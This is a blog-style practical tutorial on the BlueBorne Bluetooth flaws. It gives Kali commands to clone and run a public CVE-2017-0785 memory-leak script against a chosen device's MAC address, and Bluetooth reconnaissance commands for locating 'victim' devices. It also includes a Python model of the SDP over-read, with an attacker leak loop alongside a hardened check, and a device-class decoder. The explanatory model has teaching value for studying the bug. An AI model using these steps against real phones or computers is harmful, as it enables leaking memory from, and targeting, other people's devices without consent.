Friday, 5 January 2018

BlueBorne Attack: A Complete Practical. 5 Billion Devices at Risk




BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking



If you are using a Bluetooth-enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can be carried out remotely to take over your device, without requiring any interaction from your side.


Security researchers have discovered a total of eight zero-day vulnerabilities in Bluetooth implementations (the stacks shipped by vendors, not the protocol specification itself) that impact more than 5.3 billion devices, from Android, iOS, Windows and Linux to Internet of Things (IoT) devices, using the short-range wireless communication technology.


Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.




All an attacker needs is for the victim's device to have Bluetooth turned on and, obviously, to be within radio range of the attacker's device. Moreover, successful exploitation doesn't even require the vulnerable device to be paired with, or discoverable to, the attacker's device.


These vulnerabilities include:


👉Information Leak Vulnerability in Android's SDP server (CVE-2017-0785)

👉Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service

👉Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile

👉The Bluetooth Pineapple in Android: logical flaw enabling a man-in-the-middle (CVE-2017-0783)

👉Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)

👉Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)

👉The Bluetooth Pineapple in Windows: logical flaw enabling a man-in-the-middle (CVE-2017-8628)

👉Apple Low Energy Audio Protocol (LEAP) Remote Code Execution vulnerability (CVE pending at the time of writing)




Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is, 10.x) are not affected; devices still on iOS 9.3.5 or earlier remain exposed to the LEAP bug.




👇👇How to Perform👇👇

CVE-2017-0785 STEP 1

Now at this point, I am wondering if Armis left this information out of the white paper intentionally, if you send more packets to the device you can dump a lot more memory, and in this memory, you will see some interesting things. They say you can find "encryption key, address space and valuable pointers (of code and or data) that can be used to bypass ASLR while exploiting a separate memory corruption vulnerability", so let's see what I found!

The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks.




Open a Kali Linux terminal and type the commands below.

First install the Bluetooth headers and the two Python libraries the proof-of-concept script imports (PyBluez for the L2CAP socket, pwntools for its packing helpers and for parsing the TARGET= argument):

sudo apt-get install bluetooth libbluetooth-dev

sudo pip install pybluez

sudo pip install pwntools

Then fetch the script and make it executable:

cd Desktop

git clone https://github.com/mailinneberg/BlueBorne.git

cd BlueBorne

ls

chmod +x CVE-2017-0785.py

Now run it against the target:

python CVE-2017-0785.py TARGET=xx:xx:xx:xx:xx:xx

Here xx:xx:xx:xx:xx:xx is the Bluetooth MAC address (six colon-separated octets) of the device you want to attack; the next section shows how to find it. The public CVE-2017-0785 scripts from this period were written for Python 2, so use python2 if python on your Kali install points to Python 3.
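To make clear what the leak described above actually is, here is an added model of the bug class behind CVE-2017-0785, written for this page: it is not Android's sdp_server.c and not the script from the repository above. SDP hands back large attribute lists in chunks and uses an opaque "continuation state" so the client can ask for the next chunk; Android encoded that state as a 2-byte offset into its response buffer. The vulnerable path below trusts the client's offset, so a forged offset just past the real response makes the 16-bit remaining-length arithmetic wrap and every extra request dumps the next slice of whatever sits after the buffer. The hardened path rejects an offset the server never issued. The PDU layout follows the Bluetooth Core Specification; the "heap" bytes, the LINKKEY marker and the choice of UUID 0x1200 are constructed assumptions.

```python
"""Model of the CVE-2017-0785 bug class: an SDP server that trusts the
client-supplied continuation offset.  Added illustration (constructed
buffers and server logic), not Android's code and not the PoC script."""
import struct

# SDP PDU identifiers and error code from the Bluetooth Core Specification
PDU_ERROR_RSP = 0x01
PDU_SERVICE_SEARCH_ATTR_REQ = 0x06
PDU_SERVICE_SEARCH_ATTR_RSP = 0x07
ERR_INVALID_CONT_STATE = 0x0005
UUID_PNP_INFORMATION = 0x1200  # assumption: any 16-bit service UUID works for the model

# Constructed sample heap: a 10-byte attribute list (uint16 attribute ID 0x0000
# holding the uint32 0x00010000) followed by bytes that must never leave the device.
SAMPLE_ATTR_LISTS = bytes([0x35, 0x08, 0x09, 0x00, 0x00, 0x0A, 0x00, 0x01, 0x00, 0x00])
SAMPLE_NEIGHBOUR = b"\x00" * 6 + b"LINKKEY:0123456789abcdef" + b"\x41" * 16  # fake marker


def build_request(txn_id, uuid16, max_attr_bytes, cont_state=b""):
    """ServiceSearchAttributeRequest: header, one-UUID search pattern,
    MaximumAttributeByteCount, attribute range 0x0000-0xFFFF, then the
    1-byte-length-prefixed ContinuationState."""
    search_pattern = bytes([0x35, 0x03, 0x19]) + struct.pack(">H", uuid16)
    attr_id_list = bytes([0x35, 0x05, 0x0A]) + struct.pack(">HH", 0x0000, 0xFFFF)
    params = (search_pattern + struct.pack(">H", max_attr_bytes) + attr_id_list
              + bytes([len(cont_state)]) + cont_state)
    return struct.pack(">BHH", PDU_SERVICE_SEARCH_ATTR_REQ, txn_id, len(params)) + params


def parse_response(pdu):
    """Return (pdu_id, attribute bytes, continuation state) from a response PDU."""
    pdu_id, _txn_id, plen = struct.unpack(">BHH", pdu[:5])
    params = pdu[5:5 + plen]
    if pdu_id == PDU_ERROR_RSP:
        return pdu_id, b"", b""
    count = struct.unpack(">H", params[:2])[0]
    cont_len = params[2 + count]
    return pdu_id, bytes(params[2:2 + count]), bytes(params[3 + count:3 + count + cont_len])


class SdpServerModel:
    """Hands out the response buffer in chunks of max_attr_bytes and tracks the
    position with a 2-byte continuation offset. validate_offset=False is the bug."""

    def __init__(self, attr_lists, neighbouring_heap, validate_offset):
        self.heap = bytearray(attr_lists + neighbouring_heap)  # rsp buffer + what follows it
        self.rsp_len = len(attr_lists)
        self.validate_offset = validate_offset

    def handle(self, req):
        _pdu_id, txn_id, plen = struct.unpack(">BHH", req[:5])
        params = req[5:5 + plen]
        pos = 2 + params[1]                        # skip the search pattern sequence
        max_attr_bytes = struct.unpack(">H", params[pos:pos + 2])[0]
        pos += 2
        pos += 2 + params[pos + 1]                 # skip the attribute ID list sequence
        cont_len = params[pos]
        cont_state = params[pos + 1:pos + 1 + cont_len]
        offset = struct.unpack(">H", cont_state)[0] if cont_len == 2 else 0

        if self.validate_offset and offset > self.rsp_len:
            # Hardened path: refuse a continuation offset the server never issued
            return struct.pack(">BHHH", PDU_ERROR_RSP, txn_id, 2, ERR_INVALID_CONT_STATE)

        # Bug class: the unchecked offset feeds 16-bit length arithmetic; for any
        # offset past the buffer "remaining" wraps to ~64 KiB and the copy reads
        # whatever memory sits after the response buffer.
        remaining = (self.rsp_len - offset) & 0xFFFF
        chunk = bytes(self.heap[offset:offset + min(max_attr_bytes, remaining)])
        next_offset = offset + len(chunk)
        cont = struct.pack(">H", next_offset) if next_offset < self.rsp_len else b""
        params = struct.pack(">H", len(chunk)) + chunk + bytes([len(cont)]) + cont
        return struct.pack(">BHH", PDU_SERVICE_SEARCH_ATTR_RSP, txn_id, len(params)) + params


def legitimate_query(server, max_attr_bytes=4):
    """Well-behaved client: start with no continuation state and echo back
    whatever the server returns until it signals completion."""
    out, cont, txn = b"", b"", 1
    while True:
        _, data, cont = parse_response(server.handle(
            build_request(txn, UUID_PNP_INFORMATION, max_attr_bytes, cont)))
        out += data
        txn += 1
        if not cont:
            return out


def leak_memory(server, start_offset, length, chunk=16):
    """Attacker loop: each request forges an offset past the real response, so
    every extra packet dumps the next chunk of adjacent memory.  Returns None
    if the server rejects the forged continuation state."""
    leaked, txn = b"", 1
    for off in range(start_offset, start_offset + length, chunk):
        pdu_id, data, _ = parse_response(server.handle(
            build_request(txn, UUID_PNP_INFORMATION, chunk, struct.pack(">H", off))))
        if pdu_id == PDU_ERROR_RSP:
            return None
        leaked += data
        txn += 1
    return leaked


if __name__ == "__main__":
    vulnerable = SdpServerModel(SAMPLE_ATTR_LISTS, SAMPLE_NEIGHBOUR, validate_offset=False)
    hardened = SdpServerModel(SAMPLE_ATTR_LISTS, SAMPLE_NEIGHBOUR, validate_offset=True)
    real_len = len(legitimate_query(vulnerable, 0xFFFF))   # a normal query reveals the size
    print("vulnerable leaks:", leak_memory(vulnerable, real_len + 1, len(SAMPLE_NEIGHBOUR)))
    print("hardened returns:", leak_memory(hardened, real_len + 1, len(SAMPLE_NEIGHBOUR)))
```

The first legitimate query tells the attacker how long the real response is; from then on the client, not the server, picks the offsets, which is why sending more packets to a vulnerable device keeps dumping more memory. Note that the model only shows the over-read; the real Android fix compared the client's continuation state against what the server had actually handed out, which is the same property the hardened branch enforces here.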








How to grab victim's bluetooth MAC address

FIRE UP Kali

Let's start by firing up Kali and opening a terminal. It should go without saying that you need a Linux-compatible Bluetooth adapter to continue from here.




Use Hciconfig to Enable Your Bluetooth Adapter

The first step is to check whether our Bluetooth adapter is recognized and enabled. We can do this with a built-in BlueZ tool called hciconfig:


Type

 hciconfig





As you can see in this screenshot, we do have a Bluetooth adapter that has a MAC address of 10:AE:60:58:F1:37. The Bluetooth stack has named it "hci0." Now, let's make certain it is up and enabled:



hciconfig hci0 up





Good, hci0 is up and ready to work!




Scan for Bluetooth Devices with Hcitool


The BlueZ stack also has some excellent command line (CLI) tools for scanning for Bluetooth devices. These are located in hcitool. Let's first use the scanning portion of this tool to look for Bluetooth devices that answer inquiries (that is, devices currently in discoverable mode). Type:

 hcitool scan







In the screenshot above, you can see it found two devices, ANDROID BT and SCH-I535. Now, let's try the inquiry (inq) command in hcitool to garner more information about these devices:



hcitool inq







Note that it also displays the clock offset and the class. The class indicates what type of Bluetooth device it is; we can look up the code in the Baseband section of the Bluetooth SIG Assigned Numbers (the Class of Device tables) to see what type of device it is. Or, as we will see later, some tools will do this for us.

Hcitool is a powerful command line interface to the Bluetooth stack that can do many, many things. In the screenshot below, you can see some of the commands that it can execute. Many of the Bluetooth hacking tools that we will be using in future tutorials simply use these commands in a script. You can easily create your own tool by using these commands in your own script.



Scan for Services with Sdptool




Service Discovery Protocol (SDP) is the Bluetooth protocol for discovering the services a device offers. BlueZ has a tool called sdptool that is capable of browsing a device for the services it provides. We can use it by typing:


sdptool browse <MAC Address>

Here we can see that this tool was able to pull information on all the services this device is capable of using.


See if They Are Reachable with l2ping



Now that we have the MAC addresses of all the nearby devices, we can ping them to see whether they are in reach. l2ping sends L2CAP echo requests, which a device answers whether it is in discoverable mode or not, so this works against devices that hcitool scan does not list.

 l2ping <MAC address>







This indicates that the device with the MAC address 76:6F:46:65:72:67 is within range and reachable.




Scan for Bluetooth Devices with BTScanner



For those of you who prefer an interactive tool over single commands, Kali has BTScanner. Simply type:

btscanner

When you start BTScanner, it opens a rudimentary curses-style text interface with commands along the bottom. To do an inquiry scan, simply type the letter "i" on your keyboard. In this case, BTScanner found the two devices that I found with hcitool, as well as an additional one, MINIJAMBOX.





To gather more information about the device, simply place the cursor over the device and hit Enter on your keyboard. It will then display all of the information it has gathered about the device, similar to sdptool.







In this case, this is the information about the SCH-I535 device. Notice about a third of the way down the screen, under class, it identifies it as a "Phone/Smart phone" from its class number, 0x5a020c.
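Rather than looking every class number up on the Bluetooth SIG site, the reconnaissance steps above can be scripted. The following is an added example written for this page (not part of the original tutorial, and not a BlueZ tool): it parses hcitool inq output lines and decodes the 24-bit Class of Device into its major service classes (bits 13 to 23), major device class (bits 8 to 12) and minor device class (bits 2 to 7), using the tables from the Bluetooth SIG Assigned Numbers. The sample output is constructed; the first address and the class 0x5a020c are the values quoted on this page, paired here purely for illustration, and the other two records are invented.

```python
"""Decode the Class of Device (CoD) values that hcitool inq and btscanner print.
Added example for this page; the sample inquiry output below is constructed."""
import re

# Bluetooth SIG Assigned Numbers (Baseband): major service class bits
SERVICE_CLASS_BITS = {13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
                      18: "Rendering", 19: "Capturing", 20: "Object Transfer",
                      21: "Audio", 22: "Telephony", 23: "Information"}
# Major device class (bits 8-12)
MAJOR_DEVICE = {0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
                0x03: "LAN/Network Access Point", 0x04: "Audio/Video", 0x05: "Peripheral",
                0x06: "Imaging", 0x07: "Wearable", 0x08: "Toy", 0x09: "Health",
                0x1F: "Uncategorized"}
# Minor device class (bits 2-7) for the major classes seen most in scans;
# other majors fall back to the raw minor value
MINOR_DEVICE = {
    0x01: {0: "Uncategorized", 1: "Desktop workstation", 2: "Server-class computer",
           3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA",
           6: "Wearable computer", 7: "Tablet"},
    0x02: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smart phone",
           4: "Wired modem or voice gateway", 5: "Common ISDN access"},
    0x04: {1: "Wearable headset", 2: "Hands-free", 4: "Microphone", 5: "Loudspeaker",
           6: "Headphones", 7: "Portable audio", 8: "Car audio", 9: "Set-top box",
           10: "HiFi audio", 11: "VCR", 12: "Video camera", 13: "Camcorder",
           14: "Video monitor", 15: "Video display and loudspeaker",
           16: "Video conferencing", 18: "Gaming/Toy"},
}


def decode_class(cod):
    """Split a 24-bit CoD into its three fields and name each of them."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    return {
        "major": MAJOR_DEVICE.get(major, "Reserved (0x%02x)" % major),
        "minor": MINOR_DEVICE.get(major, {}).get(minor, "0x%02x" % minor),
        "services": [name for bit, name in SERVICE_CLASS_BITS.items() if cod & (1 << bit)],
    }


# One "hcitool inq" result line: address, clock offset, class
INQ_LINE = re.compile(r"((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+clock offset:\s*(0x[0-9A-Fa-f]+)"
                      r"\s+class:\s*(0x[0-9A-Fa-f]+)")


def parse_hcitool_inq(output):
    """Turn hcitool inq output into a list of decoded device records."""
    devices = []
    for mac, clock, cod in INQ_LINE.findall(output):
        cod_value = int(cod, 16)
        devices.append({"mac": mac, "clock_offset": int(clock, 16),
                        "class": cod_value, **decode_class(cod_value)})
    return devices


# Constructed sample output (the first line reuses the address and class quoted above)
SAMPLE_INQ = """Inquiring ...
\t76:6F:46:65:72:67\tclock offset: 0x2c6c\tclass: 0x5a020c
\t00:11:22:33:44:55\tclock offset: 0x4a61\tclass: 0x1c010c
\tAA:BB:CC:DD:EE:FF\tclock offset: 0x0102\tclass: 0x240404
"""

if __name__ == "__main__":
    for dev in parse_hcitool_inq(SAMPLE_INQ):
        print(dev["mac"], dev["major"], "/", dev["minor"], ", ".join(dev["services"]))
```

Piping real output into it is a one-liner: hcitool inq | python3 decode_cod.py (assuming you save the block under that name and replace the sample with sys.stdin.read()). For 0x5a020c the decoder reports Phone / Smart phone with the Networking, Capturing, Object Transfer and Telephony service bits set, which is the typical Class of Device advertised by an Android handset and matches what btscanner showed above.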
